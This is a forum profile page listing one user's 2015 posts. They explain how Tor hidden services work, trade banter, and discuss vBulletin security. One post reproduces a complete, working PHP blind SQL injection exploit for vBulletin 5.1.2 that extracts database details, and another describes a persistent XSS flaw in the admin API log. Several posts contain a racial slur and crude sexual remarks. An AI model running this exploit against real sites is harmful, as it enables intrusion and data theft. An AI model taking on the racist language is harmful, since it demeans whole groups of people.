User Controls
Posts by Sophie
-
2015-07-01 at 3:28 PM UTC in How does TOR handle DNS queries for hidden services?
All TCP. Tor doesn't handle UDP yet.
Not yet? Will it do so in the future to your knowledge? -
2015-07-01 at 2:44 PM UTC in ATTN: LannyYou should probably limit posting in the news forum to the administrator usergroup.
-
2015-07-01 at 2:29 PM UTC in How does TOR handle DNS queries for hidden services?
This is actually pretty complicated, I'll see if I can remember it all.
In short, there's no DNS, and a .onion address is not a domain, but a 16 character string derived from the hidden service's public key.
When a hidden service comes online, it builds circuits to several relays and sends them its public key, which tells the relays it wants to use them as introduction points.
It then creates a hidden service descriptor and uploads it to Tor's distributed hash table, which is spread across all relays with the HSDir flag. The descriptor contains the service's public key and information about its introduction points, and is signed by its private key.
Once a client knows the .onion address of the service, it connects to the DHT to retrieve the hash, and learns about the service's public key and introduction points.
The client builds a circuit to another relay, which it will use as a rendezvous point, and tells it a one time secret. It then creates an introduce message containing the one time secret and information about the rendezvous point, and signs it with the service's public key. It sends this message to the introduction point, which then forwards it to the service.
The service decrypts the introduce message with its private key, creates a rendezvous message containing the one time secret, and sends it to the rendezvous point.
The rendezvous point tells the client that a connection has been established, and they procede to communicate over separate Tor circuits. Few people realize that connecting to a hidden service involves 6 hops instead of 3, which is one of the reasons they tend to be so slow and time out often.
Also worth noting that the key pair used for authentication is only 1024 bit RSA, which is a pretty major criticism of hidden service security. I'm not really sure if I trust them anymore given that the implementation hasn't been updated in years.
That's pretty interesting, i was also wondering via what potocol this all transpires. Normal DNS goes via UDP but since there is no DNS involved is it safe to assume this all transpires via TCP? Sorry if it's a silly question but my knowledge of networking is pretty limited as of yet.
-
2015-07-01 at 10:39 AM UTC in ATTN: Lanny
Where do you meet women like this?
One of them i met way back when i was still a kid, like 14. It went a little like this:
1. Have reasonably rich parents.
2. Live in a upper middle class neighborhood. (This is important because in general the well off people are the smart people and will probably have smart kids)
3. Hang out on the streets like some hoodlum in your spare time.
4. Meet people(girls included) who do the same.
Shit man i met all kinds of people, some smart some not this girl just happened to be an intelligent one. And the other one i met because a good friend of mine got involved with her. He met her in his area at a bar, lol.
I think Dutch culture is different in general from American culture though. There are lots of smart people here the only dumb ones are literally the immigrants and the niggers and i ain't even racist. There are also a lot of idiots in the bigger cities.
-
2015-07-01 at 10:20 AM UTC in How does TOR handle DNS queries for hidden services?I read that normally the exit node queries the DNS server which sends the resolved host back through the network. But how does this work with .onion domains?
-
2015-07-01 at 10:02 AM UTC in ATTN: Lanny
We all crave Lanny's attention so desperately. He's the closest thing many of us have had to a genuinely cool and intelligent female in our lives.
Have you ever considered a sex change operation? Could be an interesting experience, having lived as both a man and a woman. The latter may suit you more, give you an unrivaled sense of freedom.
It would be pretty awkward if Lanny suddenly had a sex change. But what do i know.
#LGBBQTranFolkLyfe
Also, i actually have two female friends that are intelligent and cool believe it or not(And a sister), and i would only bang one of them, who am i kidding i'd probably bang them both(Not my sister, she's not attractive enough) but that's immaterial. They're actually pretty smart.
Come to think of it, one of these girls was almost my GF at some point. Unfortunately i was seeing someone else at the time so i decided against it. Nevertheless that would have been pretty interesting. -
2015-07-01 at 6:20 AM UTC in lanny why have you named your database table and username both VB
I think it's pretty sad that Lanny has to do Internet Brands' job for them. They've had literally YEARS to patch this crap.
I found more.Persistent XSS vulnerability.
vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name) allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. Code is executed once an admin visits the API log page and clicks on the API clients name.
Vulnerable component: ./admincp/apilog.php?do=viewclient apilog.php does not sanitize xmlrpc client provided data before passing it to print_label_row to generate the output page. -
2015-07-01 at 5:53 AM UTC in ATTN: Lanny
sophisticated sophist is lacking in the sophistication area. Hey mq, how are you?
Just messing around breh. -
2015-07-01 at 5:25 AM UTC in Artwork by Alex Grey.
this place isn't the same as rdfrn, and I actually do engage in "nerdish" things, I play with my cat, drink fine wine, and read french scifi literature.
Not that nerdy bro, learn science and computers then put on glassed and pull your waist band up high then you can call yourself a nerd. -
2015-07-01 at 5:24 AM UTC in Artwork by Alex Grey.
-
2015-07-01 at 4:56 AM UTC in lanny why have you named your database table and username both VB
<?php
/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/
error_reporting(E_ALL);
ini_set('display_errors', 1);
// Get arguments
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);
// Function to send a POST request
function httpPost($url,$params)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));
$output = curl_exec($ch);
if($output == FALSE) print htmlspecialchars(curl_error($ch));
curl_close($ch);
return $output;
}
// Function to get string between two other strings
function get_string_between($string, $start, $end)
{
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
// Get version
print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
// Get user
print "\r\nUser: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
// Get database
print "\r\nDatabse: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}
print "\r\n"
?>
Lanny patched it already but i dig the script. -
2015-07-01 at 4:31 AM UTC in ppl who wanna fight you over internet bullshit
it''s no big deal, you 1337 haxor with linux :)
He's more 1337 than you think. :) -
2015-07-01 at 4:23 AM UTC in Niggas in space?
that's an awesome link. Thanks
Yeah man, it's awesome they have loads of courses. I'm doing one myself actually, so far it's been pretty insightful. -
2015-07-01 at 4:02 AM UTC in ATTN: LannySince you're a socialist and run this bitch i propose you change your name to Lenni in honor of Vladimir Lenin. Lead the BBS revolution and make us 100% social. To that effect i suggest you redistribute likes from the wealthy to the poor. The proletariat will thank you for it and we can live in mediocrity in seaculo seaclurom.
Here's a song in your honor.
Here are some words of encouragement in Russian.(Transliterated because idk cyrilic)
Revoluytziye nadezhdah sgoostk vierif sekh luydeye.
-
2015-07-01 at 3:48 AM UTC in Isn't it weird how psychomanthis turned out?
Because it nearly took you 15 minutes to come up with a response, you fucktard. (Check the timestamp)
No u. -
2015-07-01 at 3:47 AM UTC in ATTN: Micheal Myers
Is that supposed to be Dutch or Urdu?
Awesome maar dan verbasterd op een phoenetische wijze. -
2015-07-01 at 3:41 AM UTC in Deez guys stare at each other all dayDat panny.
Dat §m£ÂgØL.
Dat 4j. -
2015-06-30 at 10:59 PM UTC in lanny why have you named your database table and username both VB
no such thing.
Alright then IDK why. -
2015-06-30 at 10:48 PM UTC in lanny why have you named your database table and username both VBMaybe VB is the default account.
-
2015-06-30 at 9:07 PM UTC in you pedo phaggots will like thisWord.